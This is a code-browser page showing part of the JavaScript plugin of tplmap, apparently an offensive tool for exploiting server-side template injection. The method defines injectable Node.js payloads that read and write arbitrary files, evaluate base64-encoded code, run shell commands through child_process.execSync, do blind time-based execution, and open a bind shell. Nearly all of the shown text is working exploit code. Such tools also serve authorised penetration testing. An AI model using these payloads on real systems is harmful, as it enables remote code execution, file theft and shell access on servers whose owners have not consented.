MCPcopy
hub / github.com/epinna/tplmap / language_init

Method language_init

plugins/languages/javascript.py:13–91  ·  view source on GitHub ↗
(self)

Source from the content-addressed store, hash-verified

11class Javascript(Plugin):
12
13 def language_init(self):
14
15 self.update_actions({
16 'render' : {
17 'call': 'inject',
18 'render': """%(code)s""",
19 'header': """'%(header)s'+""",
20 'trailer': """+'%(trailer)s'""",
21 'test_render': 'typeof(%(r1)s)+%(r2)s' % {
22 'r1' : rand.randints[0],
23 'r2' : rand.randints[1]
24 },
25 'test_render_expected': 'number%(r2)s' % {
26 'r2' : rand.randints[1]
27 }
28 },
29 # No evaluate_blind here, since we've no sleep, we'll use inject
30 'write' : {
31 'call' : 'inject',
32 'write' : """require('fs').appendFileSync('%(path)s', Buffer('%(chunk_b64)s', 'base64'), 'binary')//""",
33 'truncate' : """require('fs').writeFileSync('%(path)s', '')"""
34 },
35 'read' : {
36 'call': 'render',
37 'read' : """require('fs').readFileSync('%(path)s').toString('base64')"""
38 },
39 'md5' : {
40 'call': 'render',
41 'md5': """require('crypto').createHash('md5').update(require('fs').readFileSync('%(path)s')).digest("hex")"""
42 },
43 'evaluate' : {
44 'call': 'render',
45 'evaluate': """eval(Buffer('%(code_b64)s', 'base64').toString())""",
46 'test_os': """require('os').platform()""",
47 'test_os_expected': '^[\w-]+$',
48 },
49 'blind' : {
50 'call': 'execute_blind',
51 'test_bool_true' : 'true',
52 'test_bool_false' : 'false'
53 },
54 # Not using execute here since it's rendered and requires set headers and trailers
55 'execute_blind' : {
56 'call': 'inject',
57 # execSync() has been introduced in node 0.11, so this will not work with old node versions.
58 # TODO: use another function.
59 'execute_blind': """require('child_process').execSync(Buffer('%(code_b64)s', 'base64').toString() + ' && sleep %(delay)i')//"""
60 },
61 'execute' : {
62 'call': 'render',
63 'execute': """require('child_process').execSync(Buffer('%(code_b64)s', 'base64').toString())""",
64 'test_cmd': bash.echo % { 's1': rand.randstrings[2] },
65 'test_cmd_expected': rand.randstrings[2]
66 },
67 'bind_shell' : {
68 'call' : 'execute_blind',
69 'bind_shell': bash.bind_shell
70 },

Callers

nothing calls this directly

Calls 2

update_actionsMethod · 0.80
set_contextsMethod · 0.80

Tested by

no test coverage detected